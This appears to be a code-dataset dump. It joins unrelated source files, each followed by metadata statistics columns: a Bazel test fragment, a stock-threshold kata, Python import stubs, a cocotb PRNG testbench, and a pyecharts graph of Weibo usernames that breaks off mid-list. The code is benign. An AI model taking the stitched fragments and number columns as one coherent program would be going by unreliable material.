            "framework module ios_static_xcframework_umbrella_header",
            "umbrella header \"Umbrella.h\"",
        ],
        tags = [name],
    )

    # Aggregate every test above into a single suite addressable by `name`.
    native.test_suite(
        name = name,
        tags = [name],
    )
| 59.746032
| 200
| 0.739772
| 1,910
| 15,056
| 5.367016
| 0.113089
| 0.086918
| 0.090723
| 0.114916
| 0.793484
| 0.775632
| 0.741781
| 0.719832
| 0.715833
| 0.706955
| 0
| 0.027094
| 0.168969
| 15,056
| 251
| 201
| 59.984064
| 0.792199
| 0.123273
| 0
| 0.435644
| 0
| 0.039604
| 0.631379
| 0.59708
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004951
| false
| 0
| 0
| 0
| 0.004951
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6efd892bde04360eb80a8651ffa8cb9427653f08
| 112
|
py
|
Python
|
katas/beta/to_buy_or_not_to_buy.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
katas/beta/to_buy_or_not_to_buy.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
katas/beta/to_buy_or_not_to_buy.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
def buy_or_pass(stock_price, all_time_high):
    """Decide whether to buy a stock based on its current price.

    Returns 'Buy' when the stock trades at or below 80% of its
    all-time high, and 'Pass' otherwise.
    """
    threshold = all_time_high * 0.8
    if stock_price <= threshold:
        return 'Buy'
    return 'Pass'
| 37.333333
| 66
| 0.741071
| 21
| 112
| 3.571429
| 0.666667
| 0.266667
| 0.346667
| 0.453333
| 0.56
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021053
| 0.151786
| 112
| 2
| 67
| 56
| 0.768421
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 1
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
|
0
| 8
|
3e16007db28cbba7c07bfbc4ef71dc850961e644
| 235
|
py
|
Python
|
django_shares/db/models/__init__.py
|
InfoAgeTech/django-shares
|
1b301852fa261a7eb6c872dc912517368da6cb33
|
[
"MIT"
] | null | null | null |
django_shares/db/models/__init__.py
|
InfoAgeTech/django-shares
|
1b301852fa261a7eb6c872dc912517368da6cb33
|
[
"MIT"
] | null | null | null |
django_shares/db/models/__init__.py
|
InfoAgeTech/django-shares
|
1b301852fa261a7eb6c872dc912517368da6cb33
|
[
"MIT"
] | null | null | null |
from .managers import ShareManager
from .managers import SharedObjectManager
from .mixins import AbstractSafeDeleteSharedObjectModelMixin
from .mixins import AbstractSharedObjectModelMixin
from .mixins import SafeDeleteShareModelMixin
| 39.166667
| 60
| 0.893617
| 20
| 235
| 10.5
| 0.45
| 0.142857
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 235
| 5
| 61
| 47
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3e1e3e6bf5cdbeaa2667aff50334ffbbc39ea6ce
| 39
|
py
|
Python
|
fix_dict/__init__.py
|
Senmumu/fixdict
|
2fecfc9b330449e8bd9190029f00ab535be1403e
|
[
"MIT"
] | 1
|
2018-02-27T09:48:27.000Z
|
2018-02-27T09:48:27.000Z
|
fix_dict/__init__.py
|
Senmumu/fixdict
|
2fecfc9b330449e8bd9190029f00ab535be1403e
|
[
"MIT"
] | null | null | null |
fix_dict/__init__.py
|
Senmumu/fixdict
|
2fecfc9b330449e8bd9190029f00ab535be1403e
|
[
"MIT"
] | null | null | null |
from fix_dict.fix_dict import fix_dict
| 19.5
| 38
| 0.871795
| 8
| 39
| 3.875
| 0.5
| 0.677419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3e382bde8a9717dce85a642d38f8f58edccd031a
| 50
|
py
|
Python
|
MORSE/lab_world/src/lab_world/builder/robots/__init__.py
|
offroad-robotics/Robot-Simulator-Comparison
|
941b05be679a90f404ba6bb507f09d5289de79aa
|
[
"MIT"
] | null | null | null |
MORSE/lab_world/src/lab_world/builder/robots/__init__.py
|
offroad-robotics/Robot-Simulator-Comparison
|
941b05be679a90f404ba6bb507f09d5289de79aa
|
[
"MIT"
] | null | null | null |
MORSE/lab_world/src/lab_world/builder/robots/__init__.py
|
offroad-robotics/Robot-Simulator-Comparison
|
941b05be679a90f404ba6bb507f09d5289de79aa
|
[
"MIT"
] | null | null | null |
from .husky import Husky
from .husky import Husky
| 16.666667
| 24
| 0.8
| 8
| 50
| 5
| 0.375
| 0.45
| 0.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 50
| 2
| 25
| 25
| 0.952381
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
e49d4e597e9405bbb83dd82832db5867f486dded
| 154
|
py
|
Python
|
src/caracal/declaration/__init__.py
|
caracalai/caracal
|
c93373fb88091175c32dc0e4a91eb7a78b693367
|
[
"MIT"
] | 25
|
2021-12-10T14:07:04.000Z
|
2022-02-21T14:45:31.000Z
|
src/caracal/declaration/__init__.py
|
caracalai/caracal
|
c93373fb88091175c32dc0e4a91eb7a78b693367
|
[
"MIT"
] | null | null | null |
src/caracal/declaration/__init__.py
|
caracalai/caracal
|
c93373fb88091175c32dc0e4a91eb7a78b693367
|
[
"MIT"
] | null | null | null |
from caracal.declaration.nodetype import MetaInfo
import caracal.declaration.datatypes as cara_types
from caracal.declaration.projects import ProjectInfo
| 38.5
| 52
| 0.883117
| 19
| 154
| 7.105263
| 0.631579
| 0.4
| 0.325926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077922
| 154
| 3
| 53
| 51.333333
| 0.950704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e4bcfdbf1ab7f54676d2f097b1d50b4aaeac13be
| 2,059
|
py
|
Python
|
acorn_prng/test/test_acorn_prng.py
|
ZhenleC/acorn_prng
|
5f7d3e5d0fcc9ffc3845dd7e97f55219ebd112ec
|
[
"Apache-2.0"
] | 1
|
2022-03-22T13:39:51.000Z
|
2022-03-22T13:39:51.000Z
|
acorn_prng/test/test_acorn_prng.py
|
ZhenleC/acorn_prng
|
5f7d3e5d0fcc9ffc3845dd7e97f55219ebd112ec
|
[
"Apache-2.0"
] | null | null | null |
acorn_prng/test/test_acorn_prng.py
|
ZhenleC/acorn_prng
|
5f7d3e5d0fcc9ffc3845dd7e97f55219ebd112ec
|
[
"Apache-2.0"
] | 1
|
2022-03-21T10:56:21.000Z
|
2022-03-21T10:56:21.000Z
|
import cocotb
from cocotb.triggers import Timer
async def _clock_cycle(dut):
    """Drive one full clock cycle: low for 1 ns, then high for 1 ns."""
    dut.clk.value = 0
    await Timer(1, units="ns")
    dut.clk.value = 1
    await Timer(1, units="ns")


async def _reset(dut):
    """Assert reset for one clock cycle."""
    dut.reset.value = 1
    await _clock_cycle(dut)


async def _load_seed(dut, select, expected_seed, msg):
    """Load the seed chosen by `select` for one cycle and verify it latched."""
    dut.load.value = 1
    dut.reset.value = 0
    dut.select.value = select
    await _clock_cycle(dut)
    assert dut.seed.value == expected_seed, msg


async def _run_and_check(dut, checks):
    """Free-run the PRNG for 100 cycles, checking outputs at given cycles.

    Args:
        dut: the design under test handle.
        checks: dict mapping cycle index -> (expected output, assert message).
    """
    for cycle in range(100):
        dut.load.value = 0
        dut.reset.value = 0
        await _clock_cycle(dut)
        dut._log.info("Output is %s", dut.out.value)
        if cycle in checks:
            expected, msg = checks[cycle]
            assert dut.out.value == expected, msg


@cocotb.test()
async def test_acorn_prng(dut):
    """Try accessing the design.

    Resets the PRNG, loads a seed, and checks the output stream at two
    sample cycles; then repeats with a second seed selection. The original
    duplicated reset/load/run sequences (and wrapped single steps in
    `for cycle in range(1)` loops); they are factored into helpers here
    while preserving the exact signal-drive and await order.
    """
    # First run: select=0 loads seed 2049.
    await _reset(dut)
    await _load_seed(dut, 0, 2049, "Loaded0")
    await _run_and_check(dut, {20: (2049, "correct_10"), 35: (16, "correct_11")})

    # Second run: select=3 loads seed 4095.
    await _reset(dut)
    await _load_seed(dut, 3, 4095, "Loaded3")
    await _run_and_check(dut, {20: (4095, "correct_10"), 35: (4080, "correct_11")})
| 23.94186
| 63
| 0.486644
| 275
| 2,059
| 3.614545
| 0.185455
| 0.078471
| 0.132797
| 0.193159
| 0.848089
| 0.848089
| 0.848089
| 0.848089
| 0.848089
| 0.777666
| 0
| 0.0682
| 0.387567
| 2,059
| 85
| 64
| 24.223529
| 0.720063
| 0
| 0
| 0.793103
| 0
| 0
| 0.050296
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e4e7ab1322142ef009024ade0a55e025765ad91c
| 45
|
py
|
Python
|
yabbi/blueprints/page/__init__.py
|
HealthHackAu2018/yabbi
|
84a267bae0329cbf68699c6f28f6708ecf78ff3d
|
[
"MIT"
] | 4
|
2018-09-15T00:59:44.000Z
|
2019-08-21T22:15:30.000Z
|
yabbi/blueprints/page/__init__.py
|
HealthHackAu2018/yabbi
|
84a267bae0329cbf68699c6f28f6708ecf78ff3d
|
[
"MIT"
] | null | null | null |
yabbi/blueprints/page/__init__.py
|
HealthHackAu2018/yabbi
|
84a267bae0329cbf68699c6f28f6708ecf78ff3d
|
[
"MIT"
] | 1
|
2018-09-15T06:45:21.000Z
|
2018-09-15T06:45:21.000Z
|
from yabbi.blueprints.page.views import page
| 22.5
| 44
| 0.844444
| 7
| 45
| 5.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
39e862cf17ff9e54ded776f15f8a755fc9f03df5
| 397,939
|
py
|
Python
|
app/charts/graph.py
|
chenxinjingjing/pyecharts-app
|
76ee6684b1b4ee416928adb29764b6316ad3bb39
|
[
"MIT"
] | 188
|
2017-12-21T15:27:28.000Z
|
2022-01-14T10:46:34.000Z
|
app/charts/graph.py
|
QuincyC379/pyecharts-app
|
316b370622c316e49a556aab71409d79e26c0a86
|
[
"MIT"
] | 5
|
2018-10-29T06:12:29.000Z
|
2019-12-30T07:08:09.000Z
|
app/charts/graph.py
|
QuincyC379/pyecharts-app
|
316b370622c316e49a556aab71409d79e26c0a86
|
[
"MIT"
] | 90
|
2017-12-22T07:21:15.000Z
|
2022-03-03T07:35:24.000Z
|
from pyecharts import Graph, Page, Style
WEIBO = [
[
{
"name": "",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Camel3942",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "Camel3942",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Christinez",
"symbolSize": 13,
"draggable": "False",
"value": 7,
"category": "Christinez",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "JoannaBlue",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "JoannaBlue",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Michael-Cheung-",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "Michael-Cheung-",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "NKmilitaryStudies",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "NKmilitaryStudies",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Syfannn",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "Syfannn",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Tiger公子",
"symbolSize": 13,
"draggable": "False",
"value": 7,
"category": "Tiger公子",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "VeryE",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "VeryE",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "X_iao樓",
"symbolSize": 12,
"draggable": "False",
"value": 6,
"category": "X_iao樓",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "Xiao-斌杰",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "Xiao-斌杰",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "_nearly转1",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "_nearly转1",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "lfx160219",
"symbolSize": 14,
"draggable": "False",
"value": 8,
"category": "lfx160219",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "offfarmworkes2",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "offfarmworkes2",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "sazen",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "sazen",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "stephen1999c",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "stephen1999c",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "w新晴w",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "w新晴w",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "xHao晓灏",
"symbolSize": 8,
"draggable": "False",
"value": 2,
"category": "xHao晓灏",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "上局沪段_沪",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "上局沪段_沪",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "中出宪政柏拉图",
"symbolSize": 12,
"draggable": "False",
"value": 5,
"category": "中出宪政柏拉图",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "中华龙会",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "中华龙会",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "五十岚空芔",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "五十岚空芔",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "京城吃货日记",
"symbolSize": 14,
"draggable": "False",
"value": 9,
"category": "京城吃货日记",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "人形高达奈叶",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "人形高达奈叶",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "优质羊毛",
"symbolSize": 8,
"draggable": "False",
"value": 2,
"category": "优质羊毛",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "加菲杰克",
"symbolSize": 12,
"draggable": "False",
"value": 6,
"category": "加菲杰克",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "北京金戈戈",
"symbolSize": 11,
"draggable": "False",
"value": 4,
"category": "北京金戈戈",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "南迦巴瓦的晨曦",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "南迦巴瓦的晨曦",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "吉四六",
"symbolSize": 12,
"draggable": "False",
"value": 6,
"category": "吉四六",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "喷嚏网铂程",
"symbolSize": 16,
"draggable": "False",
"value": 15,
"category": "喷嚏网铂程",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "嗨哥苏大少",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "嗨哥苏大少",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "堕落熊猫001",
"symbolSize": 13,
"draggable": "False",
"value": 7,
"category": "堕落熊猫001",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "夏至蟲之音",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "夏至蟲之音",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "天天越野跑",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "天天越野跑",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "天水2院张医生",
"symbolSize": 9,
"draggable": "False",
"value": 3,
"category": "天水2院张医生",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "天津王麟",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "天津王麟",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "孟加拉虎的BLOG",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "孟加拉虎的BLOG",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "宋燕不v",
"symbolSize": 30,
"draggable": "False",
"value": 319,
"category": "宋燕不v",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "尧哥讲笑话",
"symbolSize": 9,
"draggable": "False",
"value": 3,
"category": "尧哥讲笑话",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "开老爷车的熊",
"symbolSize": 15,
"draggable": "False",
"value": 10,
"category": "开老爷车的熊",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "张晨初艺术空间",
"symbolSize": 30,
"draggable": "False",
"value": 312,
"category": "张晨初艺术空间",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "张欧亚",
"symbolSize": 30,
"draggable": "False",
"value": 318,
"category": "张欧亚",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "我们认识",
"symbolSize": 12,
"draggable": "False",
"value": 5,
"category": "我们认识",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "战争史研究WHS",
"symbolSize": 30,
"draggable": "False",
"value": 291,
"category": "战争史研究WHS",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "战争史研究WHS:图片评论 http",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "战争史研究WHS:图片评论 http",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "投行老人",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "投行老人",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "换个名字好累人",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "换个名字好累人",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "新浪体育",
"symbolSize": 35,
"draggable": "False",
"value": 875,
"category": "新浪体育",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "方便卫生起效慢",
"symbolSize": 15,
"draggable": "False",
"value": 11,
"category": "方便卫生起效慢",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "无心耳语08",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "无心耳语08",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "暗能量泡泡",
"symbolSize": 11,
"draggable": "False",
"value": 4,
"category": "暗能量泡泡",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "歌手亚东",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "歌手亚东",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "没籽的葡萄好吃",
"symbolSize": 11,
"draggable": "False",
"value": 4,
"category": "没籽的葡萄好吃",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "澳洲李市民",
"symbolSize": 8,
"draggable": "False",
"value": 2,
"category": "澳洲李市民",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "灰狼多样性",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "灰狼多样性",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "爱哟快乐",
"symbolSize": 9,
"draggable": "False",
"value": 3,
"category": "爱哟快乐",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "猫饭P",
"symbolSize": 8,
"draggable": "False",
"value": 2,
"category": "猫饭P",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "猿十三",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "猿十三",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "王唔悦",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "王唔悦",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "相忘于2222",
"symbolSize": 11,
"draggable": "False",
"value": 4,
"category": "相忘于2222",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "简木生--包丰瀛",
"symbolSize": 18,
"draggable": "False",
"value": 19,
"category": "简木生--包丰瀛",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "紫霄时雨_苍穹要塞难民",
"symbolSize": 9,
"draggable": "False",
"value": 3,
"category": "紫霄时雨_苍穹要塞难民",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "紹灝Lam",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "紹灝Lam",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "罗昌平",
"symbolSize": 22,
"draggable": "False",
"value": 58,
"category": "罗昌平",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "耳光赵荒唐",
"symbolSize": 15,
"draggable": "False",
"value": 11,
"category": "耳光赵荒唐",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "肉食者Play",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "肉食者Play",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "胖猪猪呼呼睡",
"symbolSize": 12,
"draggable": "False",
"value": 6,
"category": "胖猪猪呼呼睡",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "花卷沉湎",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "花卷沉湎",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "苗条的小实",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "苗条的小实",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "豆名扬",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "豆名扬",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "过去的老照片",
"symbolSize": 8,
"draggable": "False",
"value": 2,
"category": "过去的老照片",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "远古的刀",
"symbolSize": 8,
"draggable": "False",
"value": 2,
"category": "远古的刀",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "重工组长于彦舒",
"symbolSize": 31,
"draggable": "False",
"value": 378,
"category": "重工组长于彦舒",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "長滒",
"symbolSize": 12,
"draggable": "False",
"value": 5,
"category": "長滒",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "陇上优品-陶磊",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "陇上优品-陶磊",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "降夭除魔齐天大圣",
"symbolSize": 11,
"draggable": "False",
"value": 4,
"category": "降夭除魔齐天大圣",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "马周扬律师",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "马周扬律师",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "鬼面绣裁",
"symbolSize": 9,
"draggable": "False",
"value": 3,
"category": "鬼面绣裁",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "魔都310土匪",
"symbolSize": 5,
"draggable": "False",
"value": 1,
"category": "魔都310土匪",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "麻黑浮云",
"symbolSize": 19,
"draggable": "False",
"value": 29,
"category": "麻黑浮云",
"label": {
"normal": {
"show": "True"
}
}
},
{
"name": "经济学原理0904",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "麻黑浮云"
},
{
"name": "于余宇",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "落花满衣",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "耳光赵荒唐"
},
{
"name": "破产伍伍陆",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "简木生--包丰瀛"
},
{
"name": "iFandom",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "hai17",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "Gen余根",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "霁月难逢00",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "tingdianle88",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "buyueeeee",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "优质羊毛"
},
{
"name": "7816呵呵",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "绵绵绵绵甜",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "假装仁波切糕",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "专卖好酒",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "鐵騎如水漫山關",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "头条股票",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "游鱼居士",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "麻黑浮云"
},
{
"name": "耗社会主义股市羊毛",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "我想爬出去",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "月下桃花枝",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "鬼面绣裁"
},
{
"name": "老盆",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "隔岸看风景2016",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "FullMetalLyle",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "POPOVISION",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "皓乙_纯",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "小纯是不穿板甲的狂战",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "成翔-同策咨询",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "X一块红布",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "麻黑浮云"
},
{
